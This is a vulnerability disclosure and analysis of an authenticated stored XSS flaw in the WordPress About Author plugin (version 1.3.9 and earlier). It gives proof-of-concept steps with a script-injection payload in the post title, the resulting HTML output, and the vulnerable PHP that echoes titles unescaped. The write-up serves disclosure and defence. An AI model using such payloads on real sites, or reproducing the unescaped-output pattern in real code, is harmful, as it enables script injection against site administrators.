Wordpress About Author <= 1.3.9 Authenticated Stored XSS

Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

Intial submission of the vulnerability

# Exploit Title: Wordpress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress About Author plugin with a version lower or equal with 1.3.9 is affected by an authenticated Stored Cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using an Wordpress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in post_title input the following payload: `"><script>alert(1)</script>`
- Save. The Stored Cross-site scripting (XSS) vulnerability is affecting all pages/routes within the Wordpress Admin panel.

Stored response output:
```
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

By going within admin panel at About Author > Add new we can add the following payload "><script>alert(1)</script>. This is not the issue, manly XSS vulnerabilities are output related issues. Therefore by looking at /wp-content/plugins/about-author at lines 335-353 we can observe the following unescaped output of user-supplied data, on line 345 that leads to the stored XSS by outputting database stored data.

<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>

The successful exploitation of the vulnerability looks as follows in the HTML output:

<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>

Note that, due to style="display:none;" of the div tag, the vulnerabilitie was available on all pages of the Wordpress Admin panel. Keep in mind that "><script>alert(1)</script> will be executed regardless of the style="display:none;".

How to fix

Update to the latest available version of the About Author plugin.

Public appearances

  • tba

Other references

  • tba